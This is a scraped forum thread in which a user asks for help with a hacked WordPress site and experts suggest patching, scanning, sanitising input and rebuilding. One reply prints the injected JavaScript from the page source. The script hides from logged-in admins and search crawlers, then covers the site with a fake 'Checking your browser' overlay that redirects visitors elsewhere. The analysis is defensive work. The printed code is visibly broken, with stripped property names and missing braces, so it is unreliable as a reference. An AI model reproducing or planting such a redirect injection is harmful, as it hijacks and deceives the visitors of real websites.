php website

romeiovasu used Ask the Experts™
I have a website suddenly some thing happened to the word press website and the menu started showing on the top.  We came to know our site got compromised, and we are trying to fix this.  Can someone help me out to see what is wrong in the page.
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®
Jim HornSQL Server Data Dude
Most Valuable Expert 2013
Author of the Year 2015

Curiosity overwhelms me ... Are you asking experts here to navigate to a site that is 'comprimised', and if so define 'comprimised' for us.


no the compromised one is got fixed.  Now we asking is there anything that we can fix the css sheet.
Owner (Aidellio)
Most Valuable Expert 2015
That's not something you'll get a lot of attention on as none of us want our computers compromised.  I've opened the page in incognito, which still isn't ideal but it was enough to show that:

is the script causing your issues.  You'll find it included at the bottom of the page.  

WARNING to other experts: It creates tracking cookies and referrer cookies to obviously read when you click through to "check your browser"

But the real issue here is how it got there in the first place.  Does your site allow for content to be entered in any way?  how do you parse, filter and sanitize your input??

You should be reviewing all your code that accepts any kind of input with reference to filtering in PHP (including sanitization and validation):
Ensure you’re charging the right price for your IT

Do you wonder if your IT business is truly profitable or if you should raise your prices? Learn how to calculate your overhead burden using our free interactive tool and use it to determine the right price for your IT services. Start calculating Now!

RobOwner (Aidellio)
Most Valuable Expert 2015

no the compromised one is got fixed
Not  That IS still compromised



Hi Rob,

i didnt understand what you are saying.  If you dont mind can you explain me more detail please.
MacleanSystem Engineer

Problem here is that you won't know which files have been compromised, and which port was exploited or which vulnerability. As far as I can see you have malware running on it right now which was injected via javascript vulnerabilities, and might be best taking it offline to minimize loss of data if they are harvesting information using the vulnerability.

Personally I would be tempted to build a clean new server, make sure it is patched and secured.
You could try running a rootkit scanner on it or malware sweep. ClamAV is often used to locate malware on Linux

Unfortunately my expertise does not go much beyond this, and it would be best getting a professional opinion added to resolve your issue in full.

I found some info running a free scan for vulnerabilities here

Result =
Known javascript malware. Details:
RobOwner (Aidellio)
Most Valuable Expert 2015

Sorry, just remembered you mentioned it's a WordPress site.  Are you on the latest version of WordPress?  Are all your plugins and themes up to date?  Any one of these elements could have a vulnerability that exposed your site
RobOwner (Aidellio)
Most Valuable Expert 2015

I agree with Maclean, you need a professional to sift through this or start from scratch on another server.   If you've got a lot of content then starting from scratch is going to be a pain.

The "malware" will most likely be in your database and injected by a malicious user so scanning your server will most likely turn up nothing.

Please refer to section 5 of my article below that has some information relating to cross site scripting and SQL/JS injection:

I found that js script by looking at the source code of the page.
MacleanSystem Engineer

According to redbot you are using PHP/5.4.45 engine
This one has various vulnerabilities as it is behind in patch levels by about 2-3 months.

So I would say that the likely cause was not having patched the we server frequently.

I will leave things with Rob and others however, he seems to have a good knowledge on these problems.
Jason C. LevineDon't talk to me.

Once a WordPress site has been compromised, you have to take a LOT of steps to make sure it is clean again. Maclean posted the link to Sucuri, which will scan the front-facing site for obvious vulnerabilities but there may be other, non-obvious backdoors now in your installation.  This article:

talks about steps you can take to attempt to recover but if you are not familiar with WordPress hacks and overall security issues, pay Sucuri to clean you up.
Scott FellDeveloper & EE Moderator
Fellow 2018
Most Valuable Expert 2013

Not fixed yet.  See line 451 (when you view source)

The code is on one line, but here I have expanded it.
function start() {
    function t(e) {
        var t = document.cookie,
            n = t.indexOf(" " + e + "=");
        n == -1 && (n = t.indexOf(e + "="));
        if (n == -1) t = null;
        else {
            n = t.indexOf("=", n) + 1;
            var r = t.indexOf(";", n);
            r == -1 && (r = t.length), t = unescape(t.substring(n, r))
        return t

    function n(e, t, n) {
        var r = new Date;
        r.setDate(r.getDate() + n);
        var i = escape(t) + (n == null ? "" : "; expires=" + r.toUTCString());
        document.cookie = e + "=" + i

    function r() {
        return document.cookie ? document.cookie.indexOf("wordpress_logged") !== -1 || document.cookie.indexOf("wp-settings") !== -1 || document.cookie.indexOf("referrerRedirectCookie") !== -1 || document.cookie.indexOf("wordpress_test") !== -1 ? (console.log("true"), !0) : (console.log("false2"), !1) : (console.log("false1"), !1)
    if (!r()) {
        n("referrerRedirectCookie", "do not redirect", 730);
        var e = navigator.userAgent;
        if (!e || e.length == 0) return;
        e = e.toLowerCase(), e.indexOf("google") == -1 && e.indexOf("bot") == -1 && e.indexOf("crawl") == -1 && hideWebSite()

function createPopup() {
    var e = document.createElement("div"); = "absolute", = "100%", = "100%", = 0, = 0, = "white", = 99999, document.body.appendChild(e), e.onclick = function() {
        window.location = w_location
    var t = document.createElement("p");
    return t.innerText = "Checking your browser before accessing " + + "...", = "center", = "x-large", = "relative", t.textContent = t.innerText, e.appendChild(t), e

function createButton() {
    var e = document.createElement("div");
    return = "absolute", = "20%", = "10%", = "10%", = "80%", = "1px solid black", = "center", = "middle", = "0, auto", = "pointer", = "xx-large", = "5px", e.onclick = function() {
        window.location = w_location
    }, e.onmouseover = function() { = "1px solid red", = "red"
    }, e.onmouseout = function() { = "1px solid black", = "black"
    }, e.innerText = "Continue", e.textContent = e.innerText, e
var w_location = "",
    hideWebSite = function() {
        var e = createPopup(),
            t = createButton();
    readyStateCheckInterval = setInterval(function() {
        if (document.readyState === "complete" || document.readyState == "interactive") clearInterval(readyStateCheckInterval), start()
    }, 10);

Open in new window

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial